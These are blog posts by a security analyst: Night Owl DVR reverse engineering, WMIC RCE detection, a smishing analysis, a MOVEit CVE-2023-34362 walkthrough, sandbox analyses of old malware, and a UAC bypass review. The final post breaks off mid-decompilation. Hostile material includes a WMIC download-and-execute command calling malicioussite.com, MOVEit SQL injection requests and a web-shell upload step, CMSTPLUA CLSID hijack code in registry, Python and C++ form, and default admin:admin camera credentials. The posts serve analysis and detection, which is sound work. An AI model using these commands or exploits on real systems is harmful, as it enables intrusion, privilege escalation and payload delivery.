Author: Ben

Analyzing Night Owl Protect CMS Application Logs + Ghidra

Analyzing the network traffic pcap led me to see that this “American” company is using a foreign (Taiwanese) P2P network and authentication infrastructure for viewing Night Owl streams via their CMS app. I don’t like it. However, it network traffic didn’t tell me why I can’t view live/recorded video playback in the Windows application. So, this requires a deepdive into the application logs. I also want to understand how the executable works and want to learn how to use Ghidra/reverse engineer more in depth.

Application Logs

I copied the program parent directory over to my linux machine for analysis. Navigated to ..\OprLog and found the app log files. During inspection of an entire log file, I found no errors regarding video playback. But, interestingly enough, Night Owl stores credentials in plaintext!!!

It’s 2024, people. Can we not store creds in plaintext, please??

But, alas, since I still did not find any ERROR messages regarding playback, it is time to dig into reverse engineering the firmware.

Ghidra

My DVR version is DVR-FTD4-8. I downloaded the firmware file from here: https://support.nightowlsp.com/hc/en-us/articles/13090197774747-FTD4-Series

Next, I attempted to import the firmware bin into Ghidra, but found that I did not know the architecture. I could make an educated guess, but really had no idea what DVR systems use for processors.

So, I attempted attach a keyboard to the device, reboot the DVR, and spam any and all the keys that would result in accessing the bootloader in order to find the specific processor architecture. But no such luck occurred.

I ended up pulling the plug on the DVR and opening up the case.

Unfortunately, the processor is covered with the heat sink. Next best thing is to look up the board schematics to see if there are correlating FCC documents showing specific processors. Motherboard is AHB8008T-NB-T36-OWL v1.02.

I found an FCC document for the bluetooth chip radiation evaluation. However, this does not provide any schematics or information on the processor.

FCC-ID_DVR-FTD4-8 Download

There is no information on this specific OWL-branded board, so I queried for only AHB8008T and found that there are various security camera DVRs using this parent board. This resulted in me finding a CVE referencing this board and its manufacturer, that the manufacturer Xiongmai.

I searched for Xiongmai plus the board name and found that it uses a Hisilicon Hi3531D:

Hi_Silicon_3531D Download

The above documentation explains that this processor uses ARM Cortex A9@1.4 GHz. I imported it as ARM Cortex (little endian).

Conclusion of Part One

I now have the firmware loaded into Ghidra. I also already have the exe and all dlls ready for import. Does the firmware contain any helpful information for me to find out why I’m experiencing the black video playback? Probably not. But I want experience in reverse engineering firmware.

Most likely the video playback error will be found in a dll and referenced in the exe. But I am also interested in finding security vulnerabilities in this product (such as the plaintext credentials) since I use this to help secure my home. And I’m also interested in finding how much of what is being sent to foreign companies and governments (and possible adversaries). Then I want to find these devices on shodan to see if I can exploit their p2p protocol.

2024-10-13
Analyzing Night Owl Protect CMS PCAP
Home security camera systems that offer ONLY offline DVR, wired cameras on a LAN — with the capability to port forward video streams to a mobile app — are non-existent. Every single “security” company offering “security” cameras all require to connect to their companies’ cloud servers — even if their product is wired to your LAN and an offline DVR storage. I hate it. But I had to get something, so I picked up Night Owl Protect from Costco back in Summer 2023.

The iOS app is fine. The MacOS app is fine. I hate how it has no web browser app (hate it). But the Windows app, which I presumed would work better than Apple, doesn’t work. Below are the relevant details:
- Issue: Video playback boxes for both live and recorded video are black frames
- OS Version: Windows 11 Pro 24H2 26100.2605
- CMS Version: 1.0.22.T.20230912
- Night Owl Protect Model: DVR-FTD4-8_1.2.4
Analysis

Wireshark PCAP

DNS query is made to ota.no-protect.com. VirusTotal shows that this a domain associated with Night Owl in order to manage devices and your account via the browser. However, no way to view video. This DNS request responds with .kota.kalayservice.com. This refers to Kalay Developer Console (KDC)”which is a tool from TUTK that provides smart device development tools, records, and documentation.” Kalay is developed by TUTK (ThroughTek Co) to be a platform for iOT devices and cloud video management.

During the authentication phase, the application calls out to all-c-master-NightOwl.iotcplatform.com. It is owned by ThroughTek and used for the remote access of AV streams. It is used for “punching” through NAT via the iotcplatform library in order to make it “user friendly” (hate it).

iotcplatform, kalay, and ThroughTek are all part of the same Taiwanese (probably Chinese) company umbrella of ThroughTek Co, Ltd. IOTCPlatform is the networking infrastructure. Kalay is the P2P software infrastructure.

Funny side note: Night Owl SP, LLC was sold in 2020 to SFP Holding, Inc. Then in 2021, BlackRock acquired a majority interest in Summit.

I’m pretty sure I found a useful error RTSP packet. Namely an invalid sample rate of 90000 for H265 codec.

I think the application is having a hard time running the h.265 codec, namely because there’s another RTP packet seemingly trying to enforce h.264. (Also, don’t mind the user and password in the RTSP URI. It’s only for that local client with a specific token. It’s not for the actual stream.)

I was able to test the RTSP stream on VLC on my linux desktop. Turns out Night Owl uses the default RTSP credentials of admin:admin. And if the streamer has multiple cameras, make sure to specify channel=. You can also specify if you want video and/or audio by using stream=1 or 0 and audio=1 or 0.

Anyways, I did check the specs on my Windows machine, and the CPU is an Intel Celeron N5095. According to Intel, it does support HEVC/h.265 via its Quick Sync Video capability. Though, there are those who have had mixed luck with the codec.

Initial Conclusion

I’m with you @Flintsone61. I feel ya.

Could be H.265/HEVC related since it was working on my Windows machine, but now it’s not. Unsure. I’ll be taking a look at the application logs in part two. I did find they store credentials in plaintext, which is fun…
2024-10-12
WMIC RCE Activity: Understanding Exploitation and Detection
I’m not a Windows sysadmin — nor have I ever been. But lately some Sentinel alerts I’ve been seeing at work are WMIC RCE related.

Windows Management Instrumentation Command-Line (WMIC) is a built-in Windows tool that allows administrators to manage systems remotely through WMI. While beneficial for legitimate use, WMIC is often exploited by attackers for RCE and lateral movement within networks. For SOC analysts, detecting and mitigating WMIC abuse is critical to maintaining network security.

WMIC for Remote Code Execution

WMIC can execute commands or scripts remotely using simple syntax, making it an ideal tool for attackers once they gain access to a network. By using WMIC, attackers bypass traditional executable file defenses and leverage its native status to remain under the radar.

Example of WMIC RCE Abuse
```
wmic /node:"192.168.1.100" /user:"admin" /password:"password123" process call create "powershell -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://malicioussite.com/payload.exe -OutFile payload.exe; Start-Process payload.exe"
```
This command downloads and executes a malicious payload on the target machine, a common tactic in ransomware or advanced persistent threat (APT) scenarios.

Detection Methods: SOC Analyst Perspective

Both Splunk and Azure Sentinel offer robust capabilities to monitor, detect, and respond to WMIC-related threats.

Splunk

In Splunk, analysts can craft queries to identify anomalous WMIC usage based on Windows Event Logs and Sysmon data.
- Important Data Sources:
  - Windows Security Logs (e.g., Event IDs 4688, 4624, 7045).
  - Sysmon logs (for detailed process creation events).
  - Network traffic logs (to detect communication with suspicious IPs).
- Splunk Query Example:
```
index=windows EventID=4688 (New_Process_Name="*\\wmic.exe") 
| search CommandLine="*process call create*" 
| stats count by Account_Name, ComputerName, CommandLine, ParentProcessName
```
This query filters for process creation events involving wmic.exe with suspicious commands, such as process call create. SOC analysts should investigate any outputs showing unusual accounts, command lines, or originating from unexpected workstations.
- Additional Actions in Splunk:
  - Correlate with Threat Intelligence Feeds: Check if the destination IP or URL in the WMIC command is flagged in threat intelligence.
  - Monitor Outbound Network Traffic: Identify if WMIC commands are followed by anomalous data exfiltration.
Azure Sentinel

Sentinel provides built-in detection rules and the ability to create custom analytics queries for WMIC abuse.
- Important Data Sources in Sentinel:
  - Windows Security Events (via Azure Log Analytics Agent).
  - Sysmon logs (if integrated with Sentinel).
  - Defender for Endpoint data (for endpoint-level insights).
- KQL Query Example in Sentinel:
```
SecurityEvent 
| where EventID == 4688 and NewProcessName endswith "wmic.exe" 
| where CommandLine contains "process call create" 
| extend AccountCustomEntity = Account 
| extend HostCustomEntity = Computer 
| project TimeGenerated, Account, Computer, CommandLine
```
This query highlights the use of WMIC to execute remote commands. Sentinel allows analysts to integrate custom alerts with workflows using Playbooks to trigger automated responses, such as disabling the account involved or isolating the affected machine.
- Hunting Query for Lateral Movement:
```
DeviceProcessEvents 
| where FileName == "wmic.exe" and ProcessCommandLine contains "node:"  
| summarize count() by InitiatingProcessAccountName, DeviceName, ProcessCommandLine
```
Best Practices for Defense
- Restrict WMIC Usage:
  Use Group Policy or Local Security Policy to limit access to WMIC for administrators and critical systems only.
- Deploy Baseline Rules:
  Configure Splunk and Sentinel to flag WMIC commands deviating from organizational baselines.
- Automate Responses:
  Leverage Sentinel Playbooks and Splunk Phantom to automate actions like isolating hosts or alerting admins.
- Monitor Attack Chains:
  Correlate WMIC events with other activity, such as privilege escalation or file downloads, to detect broader attack campaigns.
Conclusion

WMIC abuse is a common tactic among attackers, leveraging a legitimate Windows utility for malicious purposes. For SOC analysts, mastering detection techniques in Splunk and Azure Sentinel is key to mitigating this threat. Look for remote /node and process call create options.
2024-09-19
KQL query to change Azure Sentinel log timestamp format
Analysts forget that Sentinel logs output the TimeGenerated field values as UTC.

Add this line to create a reformatted timestamp field congruent to your time zone:
```
| extend FormattedTime = format_datetime(datetime_add('hour', -4, TimeGenerated), 'yyyy-MM-dd HH:mm:ss')
```
Remember to change the amount value to the UTC difference for your time zone. For example, I am in the US Eastern Time Zone, which is -4.

Now you can use the FormattedTime field string in the remainder of your query.

https://learn.microsoft.com/en-us/kusto/query/format-datetime-function?view=microsoft-fabric
https://learn.microsoft.com/en-us/kusto/query/datetime-add-function?view=microsoft-fabric
2024-09-07
Analyst Advice: Data Flow
New to an environment? Learn data flow.

Veteran to an environment? See if you can draw out the data flow from memory.

Most important thing to know as an Analyst is how data flows in your environment. Ask senior analysts or department leadership for existing documents with diagrams displaying how data/traffic ingresses and egresses to/from and within the network.

If there is no documentation, create it yourself. This helps you learn the environment, provides knowledge share with the SOC team, and shows added value to the customer.
1. Log into your SIEM (Splunk, Sentinel, etc.) and list all indices/schemas and data sources to understand what devices and type of data is being logged in the SIEM. This indicates the network and security solutions in place.
2. Next, write down what resources are usually accessed in the environment and then brainstorm how a user would access that data. For example, if it’s a Confluence portal with sensitive documentation data, does the user authenticate via an external facing portal first? Or is it only internally accessible?
3. Look at the device flow that is required for a user to authenticate, then access the data, and then to egress the data.
4. Chart these scenarios into a Visio or PowerPoint slide to show the firewalls, proxies, AD servers, web servers, and databases used in the scenario.
Data flow analysis allows the Analyst to see the forest from the trees and how navigation through the forest is possible. Crucial for effective incident response analysis.
2024-09-05
Analyzing a Smishing Attempt

Most days I ignore, delete, and/or block phishing emails or smishing messages. However, let’s dig into one to see what we can find.

Phone Number

A quick Google search shows that +63 is a Philippines country code. Hopefully this is an immediate signal that it is a phishing attempt.

No results for the full phone number shows up anymore. Honestly, it’s probably a throw-away number.

URL Analysis

I put the URL into URLScan: https://urlscan.io/result/e478ca5f-d6f8-424b-b25f-afab8cc38236/

Results show no redirections but straight to a landing page for the ezdrivema[.]com-siiiic[.]top domain.

We can see the page is a clone of the Massachusetts’ Department of Transportation EZPass program: https://www.mass.gov/ezdrivema. Funny enough, their website is alerting against this smishing attack:

The URLScan result shows a POST form /ezpassmalogin that is associated with the whole page whenever the user clicks on the button. However, all other links on the page lead to the legitimate MA DOT page. I’m not sure what all the javascript is doing, but it looks like it could be a “man in the middle” type scenario.

I also tried to access the URL via AnyRun, but it could not reach it.

VIrusTotal results are below:

0/94, https://www.virustotal.com/gui/domain/ezdrivema.com-xiiiic.top

5/96, https://www.virustotal.com/gui/url/28782f6b4692ca68adc1cc37ca2182ddcc10ad48fb3237aed1494b951bd1094b

Looks like even VirusTotal returns a 404 error. I think the URLScan results are cached from when a different user scanned it before the attacker took down the domain.

The domain was served by 47.89.248[.]140. This is a domestic geolocated IP address and owned by Alibaba cloud services. NSlookup shows that the IP serves also the following domains:

ezdrivema[.]com-xiiiic[.]top
ezdrivema[.]com-xiiiir[.]top
ezdrivema[.]com-xiiiij[.]top
ezdrivema[.]com-heeeq[.]top
ezdrivema[.]com-xiiiif[.]top
ezdrivema[.]com-xiiiia[.]top
ezdrivema[.]com-heeet[.]top
ezdrivema[.]com-xiiiin[.]top
ezdrivema[.]com-heeec[.]top
ezdrivema[.]com-xiiiiq[.]top
ezdrivema[.]com-xiiiik[.]top
ezdrivema[.]com-xiiiib[.]top
ezdrivema[.]com-heeez[.]top
ezdrivema[.]com-heeef[.]top
ezdrivema[.]com-youshz[.]top
ezdrivema[.]com-gdsgdff[.]top
ezdrivema[.]com-youshc[.]top
ezdrivema[.]com-guonix[.]top
ezdrivema[.]com-youshs[.]top
ezdrivema[.]com-gdsgdfa[.]top
ezdrivema[.]com-gdsgdfd[.]top
ezdrivema[.]com-guonib[.]top
ezdrivema[.]com-youshe[.]top
ezdrivema[.]com-gdsgdfz[.]top
ezdrivema[.]com-guonia[.]top
ezdrivema[.]com-guonis[.]top
ezdrivema[.]com-gdsgdfr[.]top
ezdrivema[.]com-youshq[.]top
ezdrivema[.]com-guonif[.]top
ezdrivema[.]com-guonit[.]top
ezdrivema[.]com-gdsgdfq[.]top
ezdrivema[.]com-gdsgdfe[.]top
ezdrivema[.]com-guoniz[.]top
ezdrivema[.]com-youshx[.]top
ezdrivema[.]com-guonih[.]top
ezdrivema[.]com-gdsgdfc[.]top

Looks like the scammers are varying the parent domain pattern. This IP address also has a pattern of phishing websites before 2023. However, all of them also seem to be HTTP status 404.

Conclusion

I have a virtual sms number to be used for testing smishing attackers, but I’m not ready to pay for international texts.

And all the domains are already down by the attacker.

2024-08-22
Welltok MOVEit Transfer Simulated Walkthrough
Another classic example of a third-party breach ruining it for the rest of us.

On 22 December 2023, the Denver-based wellness company, Welltok, sent a letter to the Attorney General of Connecticut , informing him of 847,356 CT residents’ compromised health data.

The letter describes that the real compromise occurred in May 2023 when a Threat Actor (TA) utilized the then unknown MOVEit zero-day vulnerability to exfiltrate customer data from the file server. Sadly, there was nothing that Welltok could’ve done to mitigate an unknown zero day. Although, Welltok’s SOC or CyberInfra team (whatever it may be) could have had specific alerts for anomalous data exfiltration of sensitive data (i.e., customer PHI) from important data file servers and modification of accounts to sysadmin level privileges.

Below is how it would’ve gone down.

Reconnaissance (TA0043)

TA scans the public-facing servers with various fingerprints T1595.003 — whether manually (e.g., curl -v -I command), homemade scanner bot, or premium service (i.e., Censys, Shodan, etc.). Possible fingerprints could be:
- /human.aspx indicates Progress MOVEit Transfer login form
- Header including Server: Progress MOVEit
- Possible HTML title tag including MOVEit Transfer
Initial Access (TA0001)

Exploit Public Facing Application (T1190)

TA sends HTTPS GET request to populate the ASP.NET_SessionId cookie in order to start a session with the server:
```
$ curl -I https://moveit.example.com
...
set-cookie: ASP.NET_SessionId=yxg0zv4pkpkqoobio0uoe2zf;
...
```
Next, the TA uses a vulnerability in the MOVEitISAPI.dll to set session variables for the session:
```
curl -H "xx-silock-transaction: folder_add_by_path" -H "X-siLock-Transaction: session_setvars" -I https://moveit.example.com/moveitisapi.dll?action=m2
```
To explain, m2 is an action parameter in the compiled dll. When it is called, it allows for the folder_add_by_path value to be set to the X-siLock-Transaction header. However, when this header is called (X-siLock-Transaction: folder_add_by_path) ISAPI (Internet Server API) [which filters calls to the Microsoft IIS web server’s ASP.NET application] will read the header field case insensitive and within a larger string, whereas .NET requires it to be case sensitive. This means the ISAPI can pass multiple x-silock-transaction header values with the second header being the only one ready by the .NET server.

MOVEit accepts X-SILOCK-* headers and the aforementioned dll accepts custom headers, which is what the transaction session_setvars allows. For example:
```
POST /MOVEitISAPI/MOVEitISAPI.dll?action=m2 HTTP/1.1
Host: 192.168.37.144
Connection: close
XX-siLock-Transaction: folder_add_by_path
X-siLock-Transaction: session_setvars
X-siLock-SessVar1: MyUsername: Guest
X-siLock-SessVar2: MyPkgValidationCode: 1
X-siLock-SessVar3: MyInstMessaging: 1
X-siLock-SessVar4: MyGuestEmailAddr: x@example.com
X-siLock-SessVar5: MyPkgID: 0
X-siLock-SessVar6: MyPkgSelfProvisionedRecips: x' or 1=1) LIMIT 1; -- a
X-siLock-SessVar7: MyPkgAccessCode: 1'; update users set notes='pwned' where loginname='sysadmin'; -- a
Cookie: ASP.NET_SessionId=21ts1wiqbftjbjqjbrnjbuxj; siLockLongTermInstID=0
Content-Length: 0
```
In this case, the TA submits a SQL injection using the earlier Guest credentials to create new sysadmin user with admin level permissions by targeting the activesessions table.

Finally, to maintain the session for further access, a POST request to retrieve the CSRF token. Ensure Transaction is set to dummy, Arg06 is set to anything, and Arg12 is set to promptaccesscode:
```
$ curl -ski 'https://moveit.example.com/guestaccess.aspx?Transaction=dummy&Arg06=accesscode&Arg12=promptaccesscode' | grep csrf
[...]
<input type="hidden" name="csrftoken" value="44ad7cfa2e1a73b7a636c0bb0f9ff8d8b8e4239d">
[...]
```
Persistence (TA0003)

Web Shell (TA1505.003)

Once admin level permissions is achieved, the TA uploads a reverse web shell into the new sysadmin account’s API directory structure. Ensure the uploadType is set to resumable:
```
POST https://moveit.example.com/api/v1/folders/{id}/files?uploadType=resumable
```
The file will be encrypted in the fileupload database table, but it can be deserialized. Once done, the web shell file is ready to go.

Conclusion

The MOVEit Transfer attack was a complex hack that affected a lot of orgs in the Federal government and in DoD. It was not a trivial happenstance. However, I hope this helped understand it a bit more.

For more in-depth analysis of the software and the possible exploitation path, please refer to Assetnote’s and Rapid7’s work:

https://www.assetnote.io/resources/research/moveit-transfer-rce-part-two-cve-2023-34362

https://attackerkb.com/topics/mXmV0YpC3W/cve-2023-34362/rapid7-analysis?referrer=etrblog
2024-07-05

kombat.exe Analysis

This is more or less a part three to the naprava.exe analysis. Turns out the SD card holds many malicious surprises.

Again, this is a 14-year-old malware executable from Moldova that was inadvertently stored on a SD card.

Analysis

Submitted the file to AnyRun. The file performs the following actions (with the respective timestamps):

+47ms	File drops C:\Users\admin\lzmjqt.exe
+63ms	lzmjqt.exe writes a new shell key to WinLogon registry
+218ms	Creates process svchost.exe
+281ms	svchost.exe runs file C:\Users\admin\lzmjqt.exe
+1313ms	DNS request to slade.safehousenumber[.]com
+31039ms	murik.portal-protection[.]net[.]ru
+60758ms	world.rickstudio[.]ru
+91480ms	banana.cocolands[.]su
+121s	DNS request to portal.roomshowerbord[.]com
+150s	DNS request to slade.safehousenumber[.]com
+271s	DNS request to portal.roomshowerbord[.]com

The executable drops the lzmjqt.exe. This second executable writes a persistent reverse shell to the WinLogon registry. Then the original executable creates a svchost.exe process. The svchost.exe then runs the dropped file. This malware then reaches out to its C2 domains — slade.safehousenumber[.]com and portal.roomshowerbord[.]com.

AnyRun captured a pcap and the DNS output is such:

The first request sent to safehousenumber (44.221.84[.]105)received a response, containing the following bytes:

The second request is sent to portal.roomshowerbord[.]com (193.166.255[.]171) and the response is received, containing the following bytes:

Reverse engineering the malware with Ghidra gives the following decompilation:

void entry(void)

{
  undefined4 *puVar1;
  undefined4 extraout_ECX;
  undefined4 extraout_EDX;
  byte *pbVar2;
  char **local_74;
  _startupinfo local_70;
  int local_6c;
  char **local_68;
  int local_64;
  _STARTUPINFOA local_60;
  undefined *local_1c;
  void *pvStack_14;
  undefined *puStack_10;
  undefined *puStack_c;
  undefined4 local_8;
  
  puStack_c = &DAT_0040f058;
  puStack_10 = &DAT_0040e0a8;
  pvStack_14 = ExceptionList;
  local_1c = &stack0xffffff74;
  local_8 = 0;
  ExceptionList = &pvStack_14;
  __set_app_type(2);
  _DAT_00411de8 = 0xffffffff;
  _DAT_0040f030 = 0xffffffff;
  puVar1 = (undefined4 *)__p__fmode();
  *puVar1 = DAT_0040f040;
  puVar1 = (undefined4 *)__p__commode();
  *puVar1 = DAT_0040f020;
  _DAT_00411ddc = *(undefined4 *)_adjust_fdiv_exref;
  FUN_0040e07a();
  if (DAT_00411de4 == 0) {
    __setusermatherr(&DAT_004185c4);
  }
  FUN_0040e07a();
  _initterm(&DAT_0040f03c,&DAT_0040f03c);
  local_70.newmode = DAT_00411dd0;
  __getmainargs(&local_64,&local_74,&local_68,DAT_00411de0,&local_70);
  _initterm(&DAT_0040f03c,&DAT_0040f03c);
  pbVar2 = *(byte **)_acmdln_exref;
  if (*pbVar2 != 0x22) {
    do {
      if (*pbVar2 < 0x21) goto LAB_0040e01b;
      pbVar2 = pbVar2 + 1;
    } while( true );
  }
  do {
    pbVar2 = pbVar2 + 1;
    if (*pbVar2 == 0) break;
  } while (*pbVar2 != 0x22);
  if (*pbVar2 != 0x22) goto LAB_0040e01b;
  do {
    pbVar2 = pbVar2 + 1;
LAB_0040e01b:
  } while ((*pbVar2 != 0) && (*pbVar2 < 0x21));
  local_60.dwFlags = 0;
  GetStartupInfoA(&local_60);
  GetModuleHandleA((LPCSTR)0x0);
  local_6c = FUN_0040dee8(extraout_ECX,extraout_EDX);
                    /* WARNING: Subroutine does not return */
  exit(local_6c);
}

This executable function is the runtime startup routine that:

Sets up exception handling.
Configures the application type as a console app.
Initializes global variables (e.g., file mode, floating-point settings).
Runs initializers (e.g., C++ constructors) via _initterm.
Retrieves and parses command-line arguments.
Gathers startup information.
Calls the user-defined main function (FUN_0040dee8).
Exits with main’s return value.

We would need the dropped binary to see what the real malware does.

OSINT

Filename	7zsfx.exe
VirusTotal Score	18/43
MD5	3aeb8c1edb3810196a3eff1c7a4188b2
SHA1	f117f6cbdc33cace7ee8026f8eebfc7a04a58a3c
SHA256	0477e8fa82354dc04fc44a23a05b069909aa5525f3ea474c2217a5a16a734aa2

VirusTotal upload shows the file is not signed but has a Product description of “Trend Micro AntiVirus Plus AntiSpyware”. It is categorized as part of the armadillo malware family.

slade.safehousenumber[.]com
9/94, https://www.virustotal.com/gui/domain/slade.safehousenumber.com
URLScan reaches the domain but produces a blank white page: https://urlscan.io/result/019567f0-6bd6-7669-976e-9da47cfe8b30/

44.221.84[.]105
1/94, https://www.virustotal.com/gui/ip-address/44.221.84.105
IP is AWS owned and serves many other domains — both legitimate and malicious.
URLScan also shows a blank page: https://urlscan.io/result/01956809-0a45-7eed-925f-fe6e637b1665/

portal.roomshowerbord[.]com
5/94, https://www.virustotal.com/gui/domain/portal.roomshowerbord.com
Known malware C2 domain.

193.166.255[.]171
2/94, https://www.virustotal.com/gui/ip-address/193.166.255.171
Large Finnish ISP that provides hundreds of resolutions.
URLScan shows the IP does not provide a web page: https://urlscan.io/result/01956a2a-e667-7bb8-9f13-23e97f7e4d0f/

Conclusion

Malware reaches out to C2 for second stage but these are no longer functioning — even though the domains are still alive.

IOCs

44.221.84[.]105

193.166.255[.]171

portal.roomshowerbord[.]com

slade.safehousenumber[.]com

0477e8fa82354dc04fc44a23a05b069909aa5525f3ea474c2217a5a16a734aa2

2024-03-06

ALPHV vs Defense Contractors: UAC bypass analysis
Unimportant Intro Stuff

It was reported yesterday that a British defense contractor’s, Ultra, subsidiary, Ultra Intelligence & Communications, was ransomed via the ALPHV ransomware gang. Leaked info involved contract info with NATO members (i.e., US, Israel, Switzerland). Switzerland’s DoD confirmed that the compromise affected the Swiss Air Force.

With experience in this space, I can testify that DoD contractors are very aware of this risk. Yes, the contracts can be very lucrative and the work can be very fulfilling (depending on the mission), but you are always precariously hanging over the fire of “contract renegotiation” and one mistake can tank the entire business. Sucks for Ultra employees if this tanked them. But there are no tears shed for the military industrial complex.

Back to the hack, CloudSek put an analysis report of the ALPHV ransomware binary a month after the Ultra Hack. Not sure if it was the same version used, but it’s definitely good enough for analysis reference.

UAC bypass stuff

How the heck does UAC bypass still happen in 2024?! It blows my mind that this is still allowed to happen. But whatever.

The author of the aforementioned report, Hansika Saxena — shoutout! — showed that the Threat Actor used CoGetObject to register the ransomware with the CLSID (global COM class object ID) {3E5FC7F9-9A51-4367-9063-A120244FBEC7}. This is the CMSTPLUA interface. What is that? Grok says it’s related to the Connection Manager component and that it’s an “auto-elevated COM object”, meaning, “it can execute commands with higher privileges”.

Connection Manager uses cmstplua.dll. It is used for installing connection manager service profiles. This functionality has been in Windows since before the Windows 7 introduction of UAC.

@bohops back in 2018 mentioned that one way to run this via CMD would be rundll32.exe /sta {CLSID}. The /sta stands for Single Threaded Apartment. I don’t know what that means (I’m not a Windows guy), but I’ll look into it later.

You can also use PowerShell:
```
$comObject = New-Object -ComObject {CLSID}
# Here you would need to know the exact method or property of the COM object that can execute or launch an .exe
```
CISA also reported LockBit using the same UAC bypass methodology last year. LockBit used the following way to assign the CLSID:
```
%SYSTEM32%\dllhost.exe/Processid:{3E5FC7F9-9A51-4367-9063- A120244FBEC7}
```
A dumb way of doing this is by manually writing a registry file (test.reg) and then running it:
```
Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\CLSID\{3E5FC7F9-9A51-4367-9063-A120244FBEC7}]
@="Test Class"

[HKEY_CLASSES_ROOT\CLSID\{3E5FC7F9-9A51-4367-9063-A120244FBEC7}\InprocServer32]
@="C:\\Path\\To\\Your\\test.dll"
"ThreadingModel"="Both"
```
Another way is by using python:
```
import winreg as reg

# Define the CLSID and path to your DLL
clsid = "{3E5FC7F9-9A51-4367-9063-A120244FBEC7}"
dll_path = r"C:\Path\To\Your\test.dll"

# Create the registry keys
try:
    # Open the key, or create it if it doesn't exist
    key = reg.CreateKey(reg.HKEY_CLASSES_ROOT, f"CLSID\\{clsid}")
    reg.SetValue(key, "", reg.REG_SZ, "Test Class")
    
    inproc_key = reg.CreateKey(key, "InprocServer32")
    reg.SetValue(inproc_key, "", reg.REG_SZ, dll_path)
    reg.SetValueEx(inproc_key, "ThreadingModel", 0, reg.REG_SZ, "Both")
    
    print("CLSID assigned successfully.")
except Exception as e:
    print(f"Error: {e}")
finally:
    reg.CloseKey(key)
    reg.CloseKey(inproc_key)
```
And finally in C++ (per Copilot. I’ll test it later):
```
#include <windows.h>

int main()
{
    HKEY hKey;
    LPCWSTR clsid = L"CLSID\\{3E5FC7F9-9A51-4367-9063-A120244FBEC7}";
    LPCWSTR inproc = L"CLSID\\{3E5FC7F9-9A51-4367-9063-A120244FBEC7}\\InprocServer32";
    LPCWSTR dllPath = L"C:\\Path\\To\\Your\\test.dll";
    
    // Create the CLSID key
    if (RegCreateKeyExW(HKEY_CLASSES_ROOT, clsid, 0, NULL, 0, KEY_WRITE, NULL, &hKey, NULL) == ERROR_SUCCESS)
    {
        RegSetValueExW(hKey, NULL, 0, REG_SZ, (const BYTE*)L"Test Class", sizeof(L"Test Class"));
        RegCloseKey(hKey);
    }

    // Create the InprocServer32 key
    if (RegCreateKeyExW(HKEY_CLASSES_ROOT, inproc, 0, NULL, 0, KEY_WRITE, NULL, &hKey, NULL) == ERROR_SUCCESS)
    {
        RegSetValueExW(hKey, NULL, 0, REG_SZ, (const BYTE*)dllPath, (DWORD)(wcslen(dllPath) + 1) * sizeof(WCHAR));
        RegSetValueExW(hKey, L"ThreadingModel", 0, REG_SZ, (const BYTE*)L"Both", sizeof(L"Both"));
        RegCloseKey(hKey);
    }

    return 0;
}
```
A quick Google search shows this bypass is nothing new and has been used for 3+ years by ransomware gangs, including LockBit (Привет мои дружики!))). HOW THE HECK IS THIS STILL HAPPENING????
2024-03-06

shakira.exe Analysis

This is more or less a part two to the naprava.exe analysis. Turns out the SD card holds many malicious surprises.

Again, this is a 14-year-old malware executable from Moldova that was inadvertently stored on a SD card.

Analysis

shakira.exe loads the following dlls in chronological order:

+46ms
- ntdll.dll
- kernel32.dll
+62 ms
- KernelBase.dll
- user32.dll
- gdi32.dll
- lpk.dll
- usp10.dll
- msvcrt.dll
+78 ms
- C:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
- advapi32.dll
- sechost.dll
- rpcrt4.dll
- loeaut32.dll
- ole32.dll
- shell32.dll
- shlwapi.dll
- imm32.dll
- msctf.dll
+203 ms
- apphelp.dll
+218 ms
- svchost.exe

The executable runs process svchost.exe. The process drops another executable: C:\Users\admin\xuat.exe. Then xuat.exe writes to the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon with the value explorer.exe,C:\Users\admin\xuat.exe and named Shell. The dropper did this in order to keep persistence at restart and logon. The process then reads many various registry entries regarding network connections.

At +906 ms the process creates a connection to 44.221.84[.]105:33111 (slade.safehousenumber[.]com). The process sends 21 bytes of data via UDP protocol:

At +120 seconds, the xuat.exe process creates a connection to 193.166.255[.]171:33111 (portal.roomshowerbord[.]com). The process sends 21 bytes of data via UDP protocol.

At +128 seconds, the Windows Media Player Network Sharing Service Configuration Application (C:\Program Files\Windows Media Player\wmpnscfg.exe)runs in the background and gathers client information (reads computer name, checks supported languages, and other sysinfo).

At +151 seconds, the xuat.exe process creates a connection to 44.221.84[.]105:33111 (slade.safehousenumber[.]com). The process sends 21 bytes of data via UDP protocol:

The malware seems to gather system information and send it to C2 servers.

Ghidra produced the following decompiled output:

void entry(void)

{
  undefined4 *puVar1;
  undefined4 extraout_ECX;
  uint extraout_EDX;
  byte *pbVar2;
  char **local_74;
  _startupinfo local_70;
  int local_6c;
  char **local_68;
  int local_64;
  _STARTUPINFOA local_60;
  undefined *local_1c;
  void *pvStack_14;
  undefined *puStack_10;
  undefined *puStack_c;
  undefined4 local_8;
  
  puStack_c = &DAT_00412058;
  puStack_10 = &DAT_0041148c;
  pvStack_14 = ExceptionList;
  local_1c = &stack0xffffff6c;
  local_8 = 0;
  ExceptionList = &pvStack_14;
  __set_app_type(2);
  _DAT_00412038 = 0xffffffff;
  _DAT_00412078 = 0xffffffff;
  puVar1 = (undefined4 *)__p__fmode();
  *puVar1 = DAT_0041214c;
  puVar1 = (undefined4 *)__p__commode();
  *puVar1 = DAT_0041206c;
  _DAT_00412070 = *(undefined4 *)_adjust_fdiv_exref;
  FUN_0041147b();
  if (DAT_0041208c == 0) {
    __setusermatherr(&DAT_00412254);
  }
  FUN_0041147b();
  _initterm(&DAT_00412090,&DAT_00412090);
  local_70.newmode = DAT_00412020;
  __getmainargs(&local_64,&local_74,&local_68,DAT_00412080,&local_70);
  _initterm(&DAT_00412090,&DAT_00412090);
  pbVar2 = *(byte **)_acmdln_exref;
  if (*pbVar2 != 0x22) {
    do {
      if (*pbVar2 < 0x21) goto LAB_0041140f;
      pbVar2 = pbVar2 + 1;
    } while( true );
  }
  do {
    pbVar2 = pbVar2 + 1;
    if (*pbVar2 == 0) break;
  } while (*pbVar2 != 0x22);
  if (*pbVar2 != 0x22) goto LAB_0041140f;
  do {
    pbVar2 = pbVar2 + 1;
LAB_0041140f:
  } while ((*pbVar2 != 0) && (*pbVar2 < 0x21));
  local_60.dwFlags = 0;
